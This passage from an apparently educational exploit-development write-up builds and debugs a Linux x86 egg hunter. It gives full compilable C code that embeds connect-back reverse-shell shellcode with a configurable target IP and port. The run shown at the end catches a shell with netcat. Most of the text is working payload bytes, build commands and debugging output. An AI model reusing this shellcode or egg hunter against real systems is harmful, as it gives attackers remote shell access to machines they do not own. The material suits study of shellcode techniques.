jmp next_byte_in_page ; mismatch: resume the search at EDX + 1
egg_found:
jmp edi               ; EDI addresses the byte after the egg: continue execution there

Note: We compile our new assembly code:

nasm -f elf32 -o egghunter3.o egghunter3.nasm && ld -o egghunter3 egghunter3.o
objdump -d ./egghunter3|grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-6 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g'

"\x31\xc9\xf7\xe1\x66\x81\xca\xff\x0f\x42\x8d\x1a\x6a\x21\x58\xcd\x80\x3c\xf2\x74\xef\x89\xd7\xd6\x40\xae\x75\xed\xd0\xe0\x3c\x40\x74\x05\xae\x74\xf7\xeb\xe2\xff\xe7"
We replace the egghunter bytes in myegg5.c with the fixed egghunter shellcode above and recompile myegg5.c

Upon running myegg5.c, we still get a segfault - more gdb is required!

gdb myegg5 -ex 'break *0x0804a067' -ex 'run'

=> 0x804a067 <egghunter+39>:    jmp    edi
gdb$ disassemble 0x0804a084
Dump of assembler code for function shellcode:
0x0804a080 <+0>:    add    DWORD PTR [edx],eax
0x0804a082 <+2>:    add    al,0x8
0x0804a084 <+4>:    xor    eax,eax
0x0804a086 <+6>:    push   eax
0x0804a087 <+7>:    inc    eax
0x0804a088 <+8>:    push   eax
0x0804a089 <+9>:    pop    ebx
0x0804a08a <+10>:    push   eax
0x0804a08b <+11>:    inc    eax
0x0804a08c <+12>:    push   eax
0x0804a08d <+13>:    mov    al,0x66
0x0804a08f <+15>:    mov    ecx,esp
0x0804a091 <+17>:    jg     0x804a094 <shellcode+20>
0x0804a093 <+19>:    add    DWORD PTR [ecx],eax
0x0804a095 <+21>:    jg     0x804a098 <shellcode+24>
0x0804a097 <+23>:    add    DWORD PTR [edx+edx*8],eax
0x0804a09a <+26>:    mov    ax,0xb315

What happened to our shellcode? Did the egg signature change the shellcode?

first we check the actual shellcode is still valid:

echo -n $'\x31\xc0\x50\x40\x50\x5b\x50\x40\x50\xb0\x66\x89\xe1\xcd\x80\x97\xb8\x7f\x01\x01\x01\x50\x66\xb8\x15\xb3\x43\x66\x50\x66\x53\x43\x89\xe1\x31\xc0\xb0\x10\x50\x51\x57\xb0\x66\x89\xe1\xcd\x80\x87\xcb\x87\xdf\x49\xb0\x3f\xcd\x80\x75\xf9\x50\x50\x59\x5a\x50\xb0\x0b\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x87\xe3\xcd\x80' | ndisasm -u -

The shellcode seems fine. So I check the shell with the egg prepended (the anticipation!..)

echo -n $'\x01\x02\x04\x08\x10\x20\x31\xc0\x50\x40\x50\x5b\x50\x40\x50\xb0\x66\x89\xe1\xcd\x80\x97\xb8\x7f\x01\x01\x01\x50\x66\xb8\x15\xb3\x43\x66\x50\x66\x53\x43\x89\xe1\x31\xc0\xb0\x10\x50\x51\x57\xb0\x66\x89\xe1\xcd\x80\x87\xcb\x87\xdf\x49\xb0\x3f\xcd\x80\x75\xf9\x50\x50\x59\x5a\x50\xb0\x0b\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x87\xe3\xcd\x80' | ndisasm -u -

The egg does not seem to affect our shellcode. Something else must be changing the shellcode during run-time.
In a light-bulb moment, I realize that we're dynamically changing the IP and port in the code, but we haven't changed our shellcode offsets: What happened was that the egg grew our shellcode by 6 bytes and we need to correct our offsets to match. So if we add 6 to the offsets of the port and IP, all should be good!
And finally, after making the changes, we have a working egg hunter shellcode. GDB once again came to the rescue and gave me the answers I needed.

The final code:

/*
Filename: myegg6.c
Author: JollyFrogs (LookoutFrog@gmail.com)
License: This work is licensed under a Creative Commons
Attribution-NonCommercial 4.0 International License.
Compile:
gcc -m32 -fno-stack-protector -z execstack myegg6.c -o myegg6
Shellcode size: 85 Bytes
Egghunter size: 41 Bytes
*/

#include <stdio.h>
#include <string.h>
#include <ctype.h>
#include <stdbool.h>

unsigned char egghunter[] = \
"\x31\xc9\xf7\xe1\x66\x81\xca\xff\x0f\x42\x8d\x1a\x6a\x21\x58\xcd"
"\x80\x3c\xf2\x74\xef\x89\xd7\xd6\x40\xae\x75\xed\xd0\xe0\x3c\x40"
"\x74\x05\xae\x74\xf7\xeb\xe2\xff\xe7";

unsigned char shellcode[] = \
"\x01\x02\x04\x08\x10\x20" // Egg signature
"\x31\xc0\x50\x40\x50\x5b\x50\x40\x50\xb0\x66\x89\xe1\xcd\x80\x97"
"\xb8\x7f\x01\x01\x01\x50\x66\xb8\x15\xb3\x43\x66\x50\x66\x53\x43"
"\x89\xe1\x31\xc0\xb0\x10\x50\x51\x57\xb0\x66\x89\xe1\xcd\x80\x87"
"\xcb\x87\xdf\x49\xb0\x3f\xcd\x80\x75\xf9\x50\x50\x59\x5a\x50\xb0"
"\x0b\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x87\xe3\xcd\x80";

/*
 * Verify that shellcode[] contains no 0x00 byte.
 * On the first zero byte its index is printed and false is returned;
 * true is returned when the whole array is clean.
 */
static bool shellcode_zerocheck() {
    /* the string literal appends a NUL terminator; it is not part of the shellcode */
    const int payload_len = (int)sizeof(shellcode) - 1;
    int pos = 0;

    while (pos < payload_len) {
        if (shellcode[pos] == 0) {
            printf("Zero found in shellcode at position %i\n", pos);
            return false;
        }
        pos++;
    }
    return true;
}

/*
 * Verify that egghunter[] contains no 0x00 byte.
 * On the first zero byte its index is printed and false is returned;
 * true is returned when the whole array is clean.
 */
static bool egghunter_zerocheck() {
    /* the string literal appends a NUL terminator; it is not part of the egg hunter */
    const int hunter_len = (int)sizeof(egghunter) - 1;
    int pos = 0;

    while (pos < hunter_len) {
        if (egghunter[pos] == 0) {
            printf("Zero found in egghunter at position %i\n", pos);
            return false;
        }
        pos++;
    }
    return true;
}

/*
 * Patch the connect-back port into the shellcode template.
 *
 * buf  - start of the shellcode array, egg included; bytes 30 and 31 are
 *        overwritten on success
 * port - TCP port, 1024..65535
 *
 * Returns true on success. Returns false and leaves buf untouched when the
 * port is out of range or when either byte of the port is 0x00 (a message
 * is printed in the latter case).
 */
static bool shellcode_settargetport(char *buf, int port) {
    /* index of the port bytes (\x15\xb3): 24 in the bare shellcode + 6 egg bytes */
    const int port_offset = 30;

    if (port < 1024 || port > 65535) return false;

    /* Split the port arithmetically instead of storing a short and swapping:
       the result is high byte first on any host and needs no aligned access. */
    const unsigned char hi = (unsigned char)((port >> 8) & 0xff);
    const unsigned char lo = (unsigned char)(port & 0xff);

    /* a 0x00 byte would break the zero-free property that main verifies */
    if (hi == 0x00 || lo == 0x00) {
        printf("port HEX contains zeroes\n");
        return false;
    }

    buf[port_offset] = (char)hi;
    buf[port_offset + 1] = (char)lo;
    return true;
}

/*
 * Patch the connect-back IPv4 address into the shellcode template.
 *
 * buf - start of the shellcode array, egg included; bytes 23..26 are
 *       overwritten on success
 * ip  - dotted-quad string such as "127.1.1.1": exactly four decimal
 *       fields of 1-3 digits, each in 1..255, separated by '.'
 *
 * Returns true on success. Returns false and leaves buf untouched when the
 * string is malformed, when a field exceeds 255, or when a field is 0 (a
 * 0x00 byte would break the zero-free shellcode; a message is printed).
 */
static bool shellcode_settargetip(char *buf, char *ip) {
    /* index of the address bytes (\x7f\x01\x01\x01): 17 in the bare shellcode + 6 egg bytes */
    const int ip_offset = 23;
    unsigned char octet[4];
    const char *p = ip;
    int n;

    if (buf == NULL || ip == NULL) return false;

    for (n = 0; n < 4; n++) {
        int value = 0;
        int digits = 0;

        /* at most three digits per field keeps value far below int overflow */
        while (digits < 3 && isdigit((unsigned char)*p)) {
            value = value * 10 + (*p - '0');
            p++;
            digits++;
        }
        if (digits == 0 || value > 255) return false;

        /* '.' must follow the first three fields, end of string the fourth */
        if (*p != (n < 3 ? '.' : '\0')) return false;
        if (n < 3) p++;

        if (value == 0) {
            printf("IP HEX contains zeroes\n");
            return false;
        }
        octet[n] = (unsigned char)value;
    }

    /* everything validated: now it is safe to modify the shellcode */
    for (n = 0; n < 4; n++) {
        buf[ip_offset + n] = (char)octet[n];
    }
    return true;
}

main () {
// Port in decimal - should be higher than 1024 and lower than 65536
int targetport = 1234;
char *targetip = "127.1.1.1";
// Basic error checking
if (!shellcode_settargetport(shellcode, targetport)) {printf("ERROR: Invalid targetport\n");return 0;}
if (!shellcode_settargetip(shellcode, targetip)) {printf("ERROR: Invalid targetip\n");return 0;}
if (!shellcode_zerocheck()) {printf("ERROR: Shellcode contains zeroes\n");return 0;}
if (!egghunter_zerocheck()) {printf("ERROR: Egghunter contains zeroes\n");return 0;}
// Print shellcode length.
printf("Shellcode Length:  %d\n", strlen(shellcode));
printf("Egghunter Length:  %d\n", strlen(egghunter));
// Run assembly commands
__asm__ (
// Initialize registers
"movl $0x12345678, %eax\n\t"
"movl $0x12345678, %ebx\n\t"
"movl $0x12345678, %ecx\n\t"
"movl $0x12345678, %edx\n\t"
"movl $0x12345678, %edi\n\t"
"movl $0x12345678, %esi\n\t"
"movl $0x12345678, %ebp\n\t"
// execute egghunter
"jmp egghunter");
}

We compile myegg6.c and run it, while our listener is listening on port 1234:

gcc -m32 -fno-stack-protector -z execstack myegg6.c -o myegg6
nc -nlv 1234
./myegg6

Connection from 127.0.0.1 port 1234 [tcp/*] accepted
whoami
slae